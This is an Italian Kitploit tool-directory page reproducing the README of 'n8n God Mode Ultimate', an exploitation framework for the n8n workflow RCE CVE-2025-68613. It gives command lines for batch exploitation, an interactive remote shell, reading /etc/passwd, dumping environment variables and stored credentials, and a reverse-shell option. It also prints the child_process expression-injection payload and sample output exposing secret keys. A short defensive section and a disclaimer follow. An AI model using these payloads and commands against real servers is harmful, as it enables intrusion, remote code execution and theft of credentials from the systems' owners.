Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Esecuzione remota di codice nell'automazione dei workflow | Kitploit
Strumenti/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming
Strumento di Accesso Remoto
Sviluppo Payload
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Esecuzione remota di codice nell'automazione dei workflow

Vedi Repository
5328 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

n8n God Mode Ultimate - Scanner e Framework di Exploitation CVE-2025-68613

n8n God Mode Ultimate

Strumento avanzato di scansione RCE ed exploitation per l'automazione dei flussi di lavoro n8n

Python Version License CVE CVSS Score


🎯 Panoramica

n8n God Mode Ultimate è un framework completo di test di sicurezza progettato per rilevare e validare la CVE-2025-68613 nelle piattaforme di automazione dei flussi di lavoro n8n. Questa vulnerabilità critica di Remote Code Execution (RCE) colpisce le versioni di n8n tramite l'iniezione di espressioni nei contesti di esecuzione dei flussi di lavoro.

Dettagli CVE-2025-68613
  • Punteggio CVSS: 10.0 (Critico)
  • Vettore di Attacco: Rete
  • Complessità dell'Attacco: Bassa
  • Privilegi Richiesti: Bassi (credenziali valide)
  • Interazione dell'Utente: Nessuna
  • Tipo di Vulnerabilità: Iniezione di Espressioni → Remote Code Execution

Versioni interessate:

  • n8n >= 0.211.0 e < 1.120.4
  • n8n >= 1.121.0 e < 1.121.1

Versioni patchate:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Funzionalità

🔍 Rilevamento e Scansione

  • Rilevamento Intelligente della Versione - Estrae la versione di n8n dai metadati della pagina di accesso
  • Scansione Batch - Scansione concorrente multi-thread dei target con monitoraggio dell'avanzamento
  • Modalità di Scansione Multiple:
    • --detect - Solo rilevamento della versione (il più veloce, non intrusivo)
    • --safe - Verifica sicura della vulnerabilità senza exploitation
    • --poc - Validazione proof-of-concept della RCE
    • --exploit - Modalità di exploitation completa

💣 Capacità di Exploitation

  • 4 Tecniche di Exploitation:
    1. Trigger Programmato - Flusso di lavoro ad esecuzione automatica (il più affidabile)
    2. Trigger Webhook - Esecuzione attivata via HTTP
    3. Code Node - Accesso diretto a child_process
    4. Iniezione di Espressioni - Esecuzione manuale di espressioni

🎮 Funzionalità God Mode

  • Shell Interattiva - Shell remota completa con cronologia dei comandi
  • Operazioni sui File:
    • read <file> - Legge file remoti
    • write <file> <content> - Scrive file sul target
  • Estrazione dell'Ambiente - Scarica tutte le variabili d'ambiente
  • Informazioni di Sistema - Dettagli del sistema operativo, configurazione di rete, informazioni sui processi
  • Reverse Shell - Generazione opzionale del payload di reverse shell
  • Cronologia dei Comandi - Tracciamento della cronologia integrato

📊 Funzionalità Avanzate

  • Enumerazione delle Credenziali - Estrae le credenziali memorizzate tramite API
  • Dump dei Flussi di Lavoro - Esporta tutti i flussi di lavoro con i metadati
  • Estrazione della Configurazione - Dump completo della configurazione di sistema
  • Enumerazione degli Utenti - Elenca tutti gli utenti n8n
  • Analisi dei Log di Esecuzione - Analizza gli output dei comandi dalle esecuzioni dei flussi di lavoro
  • Pulizia Automatica - Eliminazione opzionale dei flussi di lavoro dopo l'esecuzione

🚀 Installazione

Prerequisiti

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

Installare le Dipendenze

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

Requisiti

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Utilizzo

Utilizzo di Base

root@kitploit:~
# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Operazioni God Mode

root@kitploit:~
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Scansione Batch

root@kitploit:~
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Formato di targets.txt:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Comandi della Shell Interattiva

Una volta in modalità shell (--shell):

root@kitploit:~
n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ Opzioni della Riga di Comando

Opzioni del Target

root@kitploit:~
-u, --url URL             URL del target n8n
-l, --list FILE           File contenente gli URL dei target
-t, --threads NUM         Numero di thread per la scansione batch (default: 10)

Autenticazione

root@kitploit:~
-e, --email EMAIL         Email utente n8n
-p, --password PASS       Password utente n8n

Modalità di Scansione

root@kitploit:~
--detect                  Solo rilevamento della versione (il più veloce)
--safe                    Verifica sicura senza exploitation
--poc                     Proof-of-concept della RCE
--exploit                 Modalità di exploitation completa

God Mode

root@kitploit:~
--god                     Abilita la god mode
--cmd COMMAND             Esegue un singolo comando
--read-file PATH          Legge un file remoto
--write-file PATH         Scrive un file remoto
--content DATA            Contenuto per l'operazione di scrittura
--dump-env                Estrae tutte le variabili d'ambiente
--shell                   Modalità shell interattiva
--revshell HOST:PORT      Payload di reverse shell

Opzioni di Exploitation

root@kitploit:~
--mode MODE               Modalità di exploit: schedule|webhook|code|expression (default: schedule)
--timeout SEC             Timeout del comando in secondi (default: 30)
--cleanup                 Elimina i flussi di lavoro dopo l'esecuzione
-k, --insecure           Disabilita la verifica SSL
-v, --verbose            Output verboso
-q, --quiet              Output minimale

🔬 Dettagli Tecnici

Metodologia di Exploitation

1. Trigger Programmato (Consigliato)

Crea un flusso di lavoro con un trigger programmato che si esegue automaticamente ogni 3 secondi. Il metodo più affidabile.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Trigger Webhook

Crea un endpoint webhook HTTP che esegue i comandi quando viene attivato.

3. Code Node

Inietta codice direttamente in un nodo Code con accesso a child_process.

4. Iniezione di Espressioni

Esecuzione manuale tramite il sistema di valutazione delle espressioni di n8n.

Rilevamento della Versione

Estrae la versione dalla configurazione Sentry codificata in base64 nella pagina di accesso:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

Endpoint API Utilizzati

  • /rest/login - Autenticazione
  • /rest/workflows - Operazioni CRUD sui flussi di lavoro
  • /rest/credentials - Enumerazione delle credenziali
  • /rest/executions - Recupero dei log di esecuzione
  • /rest/users - Enumerazione degli utenti
  • /rest/settings - Configurazione di sistema

📊 Esempi di Output

Rilevamento della Versione

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)

Proof-of-Concept RCE

root@kitploit:~
[*] Authentication successful
[*] Creating exploitation workflow...
[*] Workflow ID: hd6LxSY765WBThqd
[*] Executing command: whoami
[✓] Command executed successfully!
[+] Output: root

Shell Interattiva

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Environment Variables:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ Misure Difensive

Azioni Immediate

  1. Aggiorna alla versione patchata (>= 1.120.4 o >= 1.121.1)
  2. Disabilita le credenziali predefinite ([email protected]:admin)
  3. Implementa un'autenticazione forte (MFA consigliato)
  4. Segmentazione della rete - Limita l'accesso all'istanza n8n
  5. Controlla i flussi di lavoro - Esamina tutti i flussi di lavoro attivi
  6. Monitora i log di esecuzione - Verifica la presenza di attività sospette

Hardening a Lungo Termine

  • Abilita la registrazione di audit
  • Implementa la whitelist degli IP
  • Utilizza l'autenticazione OAuth/SSO
  • Valutazioni di sicurezza regolari
  • Mantieni n8n aggiornato
  • Crittografia del database a riposo
  • Archiviazione sicura delle credenziali
  • Monitoraggio del traffico di rete

⚠️ Disclaimer Legale

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito a scopo educativo e per test di sicurezza autorizzati. Gli utenti devono conformarsi a tutte le leggi e normative applicabili.

⚖️ Requisiti Legali

DEVI:

  • ✅ Ottenere un'autorizzazione scritta prima dei test
  • ✅ Utilizzare solo su sistemi di tua proprietà o per cui hai il permesso di testare
  • ✅ Rispettare le pratiche di responsible disclosure
  • ✅ Seguire le leggi e le normative applicabili
  • ✅ Utilizzare per scopi di sicurezza difensiva

NON DEVI:

  • ❌ Testare sistemi senza permesso esplicito
  • ❌ Utilizzare per scopi dannosi
  • ❌ Effettuare attacchi denial-of-service
  • ❌ Esfiltrare o modificare dati senza autorizzazione
  • ❌ Distribuire su sistemi di produzione senza consenso

📜 Responsabilità

L'autore non si assume ALCUNA responsabilità per l'uso improprio di questo strumento. L'accesso non autorizzato a sistemi informatici è illegale ai sensi di:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act - UK
  • Direttiva UE sulla criminalità informatica
  • Legislazione simile in tutto il mondo

Usalo a tuo rischio. Sei responsabile delle tue azioni.


🤝 Contributi

I contributi sono benvenuti! Segui queste linee guida:

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità (git checkout -b feature/improvement)
  3. Esegui il commit delle tue modifiche (git commit -am 'Add new feature')
  4. Esegui il push del branch (git push origin feature/improvement)
  5. Crea una Pull Request

Codice di Condotta

  • Segui le pratiche di responsible disclosure
  • Documenta chiaramente le funzionalità di sicurezza
  • Includi una gestione degli errori adeguata
  • Aggiungi commenti per la logica complessa
  • Testa accuratamente prima di inviare

📚 Riferimenti

Informazioni CVE

  • CVE-2025-68613 - NVD
  • Avvisi di sicurezza n8n

Documentazione n8n

  • Documentazione ufficiale n8n
  • Riferimento API n8n
  • Best practice di sicurezza n8n

Ricerca sulla Sicurezza

  • Vulnerabilità da Iniezione di Espressioni
  • Sicurezza dell'Automazione dei Flussi di Lavoro

👨‍💻 Autore

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • Sito web: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 Licenza

Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 Ringraziamenti

  • Il team di n8n per aver creato una piattaforma straordinaria di automazione dei flussi di lavoro
  • I ricercatori di sicurezza nella community n8n
  • Gli strumenti di sicurezza open-source che hanno ispirato questo progetto

📞 Supporto

Per problemi di sicurezza, segnala responsabilmente:

  • Problemi di Sicurezza: Apri un security advisory privato
  • Segnalazioni di Bug: Usa GitHub Issues
  • Richieste di Funzionalità: Apri una discussione su GitHub

⭐ Metti una stella a questo repository se lo trovi utile!

Realizzato con 💻 da ricercatori di sicurezza, per ricercatori di sicurezza

Scarica lo strumento